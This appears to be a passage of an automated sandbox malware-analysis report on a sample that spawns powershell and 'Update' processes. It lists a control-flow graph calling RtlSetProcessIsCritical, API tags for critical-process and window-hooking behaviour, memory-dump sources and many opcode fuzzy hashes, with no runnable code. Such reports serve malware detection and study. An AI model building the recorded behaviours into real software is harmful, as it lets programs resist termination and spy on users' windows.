                                                                                              control_flow_graph 1017 7ffaac4794c8-7ffaac4794e2 1020 7ffaac4794ea-7ffaac4794fa 1017->1020 1021 7ffaac4794e4-7ffaac4794e9 1017->1021 1024 7ffaac4794fc 1020->1024 1025 7ffaac479527-7ffaac479530 1020->1025 1021->1020 1028 7ffaac4794fe-7ffaac479501 1024->1028 1029 7ffaac479504-7ffaac479512 1024->1029 1026 7ffaac479572-7ffaac47963a 1025->1026 1027 7ffaac479532 1025->1027 1052 7ffaac479642-7ffaac4796a0 RtlSetProcessIsCritical 1026->1052 1033 7ffaac47953a-7ffaac479571 1027->1033 1034 7ffaac479534-7ffaac479537 1027->1034 1028->1029 1031 7ffaac47951a-7ffaac479525 1029->1031 1032 7ffaac479514-7ffaac479519 1029->1032 1031->1025 1032->1017 1032->1031 1033->1026 1034->1033 1053 7ffaac4796a8-7ffaac4796dd 1052->1053 1054 7ffaac4796a2 1052->1054 1054->1053
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2767399172.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffaac470000_HaLCYOFjMN.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalProcess
                                                                                              • String ID:
                                                                                              • API String ID: 2695349919-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2767399172.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffaac470000_HaLCYOFjMN.jbxd
                                                                                              Similarity
                                                                                              • API ID: HookWindows
                                                                                              • String ID:
                                                                                              • API String ID: 2559412058-0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2767399172.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffaac470000_HaLCYOFjMN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6
                                                                                              • API String ID: 0-3953544715
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.1522705873.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffaac490000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1abb37816e7ea89106043769c340add82788eecaabe36cca475c38d691caab1e
                                                                                              • Instruction ID: b760c5b35dafe1b3f2530eb8591e66fa6e01b9bc41826f88dc10cf9c30dcac45
                                                                                              • Opcode Fuzzy Hash: 1abb37816e7ea89106043769c340add82788eecaabe36cca475c38d691caab1e
                                                                                              • Instruction Fuzzy Hash: C6312D7180DB888FE759DF6C88496E97FE0EF66320F0481AFD04DC7152D5699849C792
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.1522705873.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffaac490000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                              • Instruction ID: 5910eff218ebdd6503179abbb95655a93dd30ac77fa8d77108b8420d4812b2c2
                                                                                              • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                              • Instruction Fuzzy Hash: A101677115CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E892CB45
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.1522705873.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffaac490000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ec6f3be936462afc24ec8f204e886b07607c94883416fb2f28d397f93126af0f
                                                                                              • Instruction ID: 2f5492249dcf0887df7425ee999620c3dc05b4eb339c7519044b4cc3d21f820e
                                                                                              • Opcode Fuzzy Hash: ec6f3be936462afc24ec8f204e886b07607c94883416fb2f28d397f93126af0f
                                                                                              • Instruction Fuzzy Hash: 6CF0467240DB8C8FE785DF1CD86A0E97FA0FF66204B0442ABE04CC3122DA22884887C1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.1523374053.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffaac560000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d39cd7bd42d9493500b21c9d82ad64dbe98d7ebddcbc5df83ce69e91726238f5
                                                                                              • Instruction ID: c2fa820e6ac97a6ea504415c137c50930e443fe18f8744298331b4e77df33ace
                                                                                              • Opcode Fuzzy Hash: d39cd7bd42d9493500b21c9d82ad64dbe98d7ebddcbc5df83ce69e91726238f5
                                                                                              • Instruction Fuzzy Hash: A4F09A32A8D5498FE698EB5CE4458A8B3E4EF55320B1580BAE05DC71A3DA25EC448780
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.1523374053.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffaac560000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0cdbb9ad172a1a89cd73fa2300b123f85fee859969d9140bbc29125b4fc48cee
                                                                                              • Instruction ID: 959a100f69241aba3830a306378d92a37bddb6c6e79ae45e6035eb6920fa9c9f
                                                                                              • Opcode Fuzzy Hash: 0cdbb9ad172a1a89cd73fa2300b123f85fee859969d9140bbc29125b4fc48cee
                                                                                              • Instruction Fuzzy Hash: FDF0BE32A8D5458FE755EB1CE0468A8B7E0EF05321B1540B6F04DCB063EB26EC44C780
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.1523374053.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffaac560000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                              • Instruction ID: 1da8f34a65741406df9eddd08b208f3b426c46e4f43b49e36b255a5874fb2c64
                                                                                              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                              • Instruction Fuzzy Hash: 44E01A31B4C809CFEAA8DB0CE0409E9B3E5EB9932171541B7E14EC7561DB32EC959BC0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.1522705873.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffaac490000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: K_^$K_^$K_^$K_^$K_^
                                                                                              • API String ID: 0-3188868157
                                                                                              • Opcode ID: 9881ec8e7097819c6ea7b8c3e6e2495065590a4da6411aa236576168e6e004d0
                                                                                              • Instruction ID: 36d57f1a47eaaddd28bbed7296bd947f3c70c0c17af783fd26f67a503b653ec7
                                                                                              • Opcode Fuzzy Hash: 9881ec8e7097819c6ea7b8c3e6e2495065590a4da6411aa236576168e6e004d0
                                                                                              • Instruction Fuzzy Hash: 595198E390E7D28FF356476C986A1A17FE0EF53219F0981F6C08C8B593ED1D584B8285
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.1522705873.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffaac490000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: K_^5$K_^8$K_^F$K_^I$K_^K
                                                                                              • API String ID: 0-34091245
                                                                                              • Opcode ID: 7c895d8b487069c86b20a5dc5e8f101a428a195b65b8b1fd6ef1a3953e51fc56
                                                                                              • Instruction ID: eb53e693b4954688ab75967ef4b7aac7ecd888228fce8bd35d3999d051cb8d24
                                                                                              • Opcode Fuzzy Hash: 7c895d8b487069c86b20a5dc5e8f101a428a195b65b8b1fd6ef1a3953e51fc56
                                                                                              • Instruction Fuzzy Hash: 522149B76941265EDA013B7DF859DE877E4DF8427934983B2D198CF213DC14B08B8AC0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.1522705873.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffaac490000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: K_^$K_^$K_^$K_^
                                                                                              • API String ID: 0-4267328068
                                                                                              • Opcode ID: 739deb6282d7254de0f4f7dc2f112f81beaeca89dcace504b2787844fd326b2d
                                                                                              • Instruction ID: b6add1fa5694faec7ea0163e869676935914253801d315afe07fdfe5d1252a61
                                                                                              • Opcode Fuzzy Hash: 739deb6282d7254de0f4f7dc2f112f81beaeca89dcace504b2787844fd326b2d
                                                                                              • Instruction Fuzzy Hash: D231C9E390E7D29BF65A071C586A0A56FE0EF6321DB0D82F6C4888A593ED19A9074285
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.1704080574.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_7ffaac550000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0bdcd55bedf5d0c9f93f6cec835f246a126d1966a2d28a806e30ff109e6ae2c8
                                                                                              • Instruction ID: 1242f885a7277808969f102615e3bd1b183a6978355e4497e7b1bfb2bde39251
                                                                                              • Opcode Fuzzy Hash: 0bdcd55bedf5d0c9f93f6cec835f246a126d1966a2d28a806e30ff109e6ae2c8
                                                                                              • Instruction Fuzzy Hash: E412056298E7CA8FF356972898195A43FE5DF53210B0981FFE08DC71A3DE19DC4A8391
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.1704080574.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_7ffaac550000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 94b7cc6e54b5cd2fe1c2d26d4456601b3c8d3de4933738f4f1373855b1f8f385
                                                                                              • Instruction ID: dbf1ce42a7244dce25c1d74ed9d6fe981ee04b73b4da1d219463938643e3830a
                                                                                              • Opcode Fuzzy Hash: 94b7cc6e54b5cd2fe1c2d26d4456601b3c8d3de4933738f4f1373855b1f8f385
                                                                                              • Instruction Fuzzy Hash: 75D167B2A1EACE8FFB55976898155B57BE4EF46310B0441BEE04DC72D3DE19EC098382
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.1703130066.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_7ffaac480000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c8ce1480e43892858619671edf7aa7654ae24e0e8d6a2cc1db63e7b149b3ae42
                                                                                              • Instruction ID: da8a1e55d9f472233359b762f3842686c86fbe043c64710254ce913fcebf3ce7
                                                                                              • Opcode Fuzzy Hash: c8ce1480e43892858619671edf7aa7654ae24e0e8d6a2cc1db63e7b149b3ae42
                                                                                              • Instruction Fuzzy Hash: 8E712CA3909BC28BF3469B5CD86B0F93FE0EF6362EB084076C59886153FD15561A47C6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.1703130066.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_7ffaac480000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dd6a426176dfc675962e3630ab61eead64cc0cdb781487167bb99cf24c2a680e
                                                                                              • Instruction ID: cc8325589b65db2eb85ee988a9d0004790602ff6f79ee34b898849a8e072165f
                                                                                              • Opcode Fuzzy Hash: dd6a426176dfc675962e3630ab61eead64cc0cdb781487167bb99cf24c2a680e
                                                                                              • Instruction Fuzzy Hash: 0C41367290DB898FF7549B5CA8AA1F53FE0EF53226F08407BD44CCB253E965941A87C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.1703130066.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_7ffaac480000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cb8368b1d320d6ce41efacbc2b75e5dc813eb530d20821481fa3d2a7471c7339
                                                                                              • Instruction ID: 95ef2aefb5b0e9b9e12b2153ce719e494eb92aeaab3400b5868f45a8794e046d
                                                                                              • Opcode Fuzzy Hash: cb8368b1d320d6ce41efacbc2b75e5dc813eb530d20821481fa3d2a7471c7339
                                                                                              • Instruction Fuzzy Hash: 83416BA390DBC28BF342AB5CD85A0F63FE0EF2371AF084077D09892193ED55561A4BC2
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.1703130066.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_7ffaac480000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 63afe4b067040049b5f6c387b3b52ec86caf18a4d9e8d49374d1f18e6edda527
                                                                                              • Instruction ID: 181f431b689f20fa7cd193b2090fceca0ed294bc34c4b4df199e01d837c28a70
                                                                                              • Opcode Fuzzy Hash: 63afe4b067040049b5f6c387b3b52ec86caf18a4d9e8d49374d1f18e6edda527
                                                                                              • Instruction Fuzzy Hash: 5231DB7191CF489FEB589F5CA84A6F97BE0FBA5310F04812FE04D93252DA30A955CBC6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.1702217889.00007FFAAC36D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC36D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_7ffaac36d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b923b310347225bf049c56c18db471da5bf7b5bcbebe6ec3db52e7fbc00f325e
                                                                                              • Instruction ID: dd56a358cdee63abd1df3214935af350ece4536e34666c8429e366b3da17c298
                                                                                              • Opcode Fuzzy Hash: b923b310347225bf049c56c18db471da5bf7b5bcbebe6ec3db52e7fbc00f325e
                                                                                              • Instruction Fuzzy Hash: 2841087140EBC48FE7569B2898559527FF0EF57320B1A05DFE088CB1A3D625E84AC7E2
                                                                                              Memory Dump Source
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_22_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 54c37cdc4a45d6335b84b5dd842b09ad71683d36de9ff082b1bacb3451c4d3c6
                                                                                              • Instruction ID: 0a57324d9ed4bd434dc424261b1d3d3056ec7a4f25465133a8c138feb51ab3be
                                                                                              • Opcode Fuzzy Hash: 54c37cdc4a45d6335b84b5dd842b09ad71683d36de9ff082b1bacb3451c4d3c6
                                                                                              • Instruction Fuzzy Hash: 8B31B571A58A4E8FEB44EB78C459AFDBBE2FF99300F644579D00AD3286CD34A945C780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000016.00000002.2003679244.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_22_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d521ab3b8c493f383f2ad2406601791779488d7dcbe0e6588d2efb9fda6a4b24
                                                                                              • Instruction ID: 0a9f5f0d33813f61de2e965b5e74a45d08dc6113dec242e25f688c736e2877b0
                                                                                              • Opcode Fuzzy Hash: d521ab3b8c493f383f2ad2406601791779488d7dcbe0e6588d2efb9fda6a4b24
                                                                                              • Instruction Fuzzy Hash: 9B31A6A169C6895FE345EF28D4A9CAD7FF2AF88200B9484E5D40BC739FDD246A008745
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000016.00000002.2003679244.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_22_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9f27294497a5aa88cbf287fad3c77be2950b190fb6f5a4aa8417e6029f763cf2
                                                                                              • Instruction ID: dc8187a0526cb8647b45dcd9d7e11536f85812fb197f0a26398f542228d566d5
                                                                                              • Opcode Fuzzy Hash: 9f27294497a5aa88cbf287fad3c77be2950b190fb6f5a4aa8417e6029f763cf2
                                                                                              • Instruction Fuzzy Hash: BE119D62E5490E8BE744E798D8599FCBBF1FF49210F548276D01FF219ACE2829454784
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000016.00000002.2003679244.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_22_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b48fdcd82106ce9f280dedf69b4e0019a42a171eb98c117eda734eb45507c577
                                                                                              • Instruction ID: d87991dfbef1dc4c7da3679f03a86f042419f0f7cf46a2a7f7c05a7d21ab120f
                                                                                              • Opcode Fuzzy Hash: b48fdcd82106ce9f280dedf69b4e0019a42a171eb98c117eda734eb45507c577
                                                                                              • Instruction Fuzzy Hash: 5F01284080E7854FF755A738585D8766FE0DFA3255B0845BAE88DC6097DC089A45C3D6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000017.00000002.2127995680.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_23_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: r6
                                                                                              • API String ID: 0-2984296541
                                                                                              • Opcode ID: ea64aa07748533294ce0c5b2db65c53f9f840eb9b8f781b932d422e085ddd412
                                                                                              • Instruction ID: 146d3f39ee0a1e6e1675eb0d701ce7f62c34fff1f8b567aa99d3b6417a11bd85
                                                                                              • Opcode Fuzzy Hash: ea64aa07748533294ce0c5b2db65c53f9f840eb9b8f781b932d422e085ddd412
                                                                                              • Instruction Fuzzy Hash: A851C15160E7C50FE786A7B898696657FE6DF8B220B0941FFE08DCB1A3CD594C0AC352
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000017.00000002.2127995680.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_23_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9f34eccf4cd922b1dd065c97681c0eb547ff048f44a12075d06a9382a046b902
                                                                                              • Instruction ID: b0f52776921e11baa1b4bd3adea2b67161616bdc5cb63e03568317b217308e69
                                                                                              • Opcode Fuzzy Hash: 9f34eccf4cd922b1dd065c97681c0eb547ff048f44a12075d06a9382a046b902
                                                                                              • Instruction Fuzzy Hash: 16513762A1E6C60FE356A73CD819AB53FD5DF87224B0981FBD08DC71A3DC1898468391
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000017.00000002.2127995680.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_23_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: r6
                                                                                              • API String ID: 0-2984296541
                                                                                              • Opcode ID: b6a901334538ba74e901162ef96d22bab083ee0210aff9209d3e1d3460cf5b58
                                                                                              • Instruction ID: 5bdd70a6cda410f44751085501f6d32715294f5e43024e47e189a98b7fda29c4
                                                                                              • Opcode Fuzzy Hash: b6a901334538ba74e901162ef96d22bab083ee0210aff9209d3e1d3460cf5b58
                                                                                              • Instruction Fuzzy Hash: 6331D761B1C9494FE798EB7CD46A779B6C6EF99311F0406BEE04EC32A3DD149C418381
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000017.00000002.2127995680.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_23_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 6
                                                                                              • API String ID: 0-1452363761
                                                                                              • Opcode ID: e33d6a18200526ca7000b4ee207d44f6c1e27ae387d87aba3d888d2ebeed9e12
                                                                                              • Instruction ID: c4e4dd0f86e566c103a432fdc528993e36196bfdb1ee44be7191d676bc879ef6
                                                                                              • Opcode Fuzzy Hash: e33d6a18200526ca7000b4ee207d44f6c1e27ae387d87aba3d888d2ebeed9e12
                                                                                              • Instruction Fuzzy Hash: FE31B262B18A0A4FF784B7BCD81E7BDBBD5EF99311F1442B6E00DC3292DD2899418791
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000017.00000002.2127995680.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_23_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b704a250e4ad7318c45f7eeda2c4f61b2e40b6d96982c707b0d695f46e5efdab
                                                                                              • Instruction ID: 2ca3a83873a2223a75be66742e89dea9b29c55b4a6eb6a2f10916c7dc4ff1e59
                                                                                              • Opcode Fuzzy Hash: b704a250e4ad7318c45f7eeda2c4f61b2e40b6d96982c707b0d695f46e5efdab
                                                                                              • Instruction Fuzzy Hash: 4102D361B29A098FE784F778C46DAB977A2EF89301F904879D40FC32D3DD28A94587C0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000017.00000002.2127995680.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_23_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0cb9170c6c6681d6bb464bfb95909d2bd4d573a7ca711e72f426ec4cd8e57ec1
                                                                                              • Instruction ID: 8f90ddb718ee10801255f22865f6ec7e6fc419152b1d9b3d184caa68bb80ced3
                                                                                              • Opcode Fuzzy Hash: 0cb9170c6c6681d6bb464bfb95909d2bd4d573a7ca711e72f426ec4cd8e57ec1
                                                                                              • Instruction Fuzzy Hash: A75159A2A8D6494FE301FB7CD4A9CF43FA0EF8530678485B6D04AC7397DD28A485C784
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000017.00000002.2127995680.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_23_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: faf05d1a4c46023347efa1338191544bab42ef865fd360a8f1da3cf217fc8abe
                                                                                              • Instruction ID: 71f472f8db4eef887f35f877e463a65fea7a4b9878be5e8b1b3c86605e46b6a7
                                                                                              • Opcode Fuzzy Hash: faf05d1a4c46023347efa1338191544bab42ef865fd360a8f1da3cf217fc8abe
                                                                                              • Instruction Fuzzy Hash: E9317171A58A0E8FEB44EB78C469AFD7BE1FF99301F608579D00AD3386DD24A845C790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000017.00000002.2127995680.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_23_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 59374cc9141bf71daca7900853c4bc123ce5f831c6b89591471673d0dba03bf2
                                                                                              • Instruction ID: a2a26c5cf730193edded7250586d6219b4b3d7846aecd81d801b187291aed231
                                                                                              • Opcode Fuzzy Hash: 59374cc9141bf71daca7900853c4bc123ce5f831c6b89591471673d0dba03bf2
                                                                                              • Instruction Fuzzy Hash: 93317EA169C64D5FE342EB28D4AACE97FB1AB88303BD0C4A5D80BC3397DD246940C781
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000017.00000002.2127995680.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_23_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d4a56286f3eaaa3662aa9241e36dca64f23bb37a3ebaa2eadc8159f2edce45fb
                                                                                              • Instruction ID: cfdd2e64492540103135121df00a83cfb165b3ae016ecdaa3ed75cb561065fb3
                                                                                              • Opcode Fuzzy Hash: d4a56286f3eaaa3662aa9241e36dca64f23bb37a3ebaa2eadc8159f2edce45fb
                                                                                              • Instruction Fuzzy Hash: 4C119061E1490E8BEB44E798D85A5FCB7B1FF89211F508376D01FF2296CE24294587C4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000017.00000002.2127995680.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_23_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3c26187b5e12d06c9e805bbc0d2f234399195f55bf2ae0a7b131f73521aaee08
                                                                                              • Instruction ID: 5b6dc41c9a2a9097a303e54a90e5db2b5faef75f6a116c1736df9aa48ceb8888
                                                                                              • Opcode Fuzzy Hash: 3c26187b5e12d06c9e805bbc0d2f234399195f55bf2ae0a7b131f73521aaee08
                                                                                              • Instruction Fuzzy Hash: E501284080E7854FF755A738586D4766FE0DFA7355B0445BAE88DC2193DC089A45C3D6

                                                                                              Execution Graph

                                                                                              Execution Coverage:9.5%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:5.1%
                                                                                              Total number of Nodes:1495
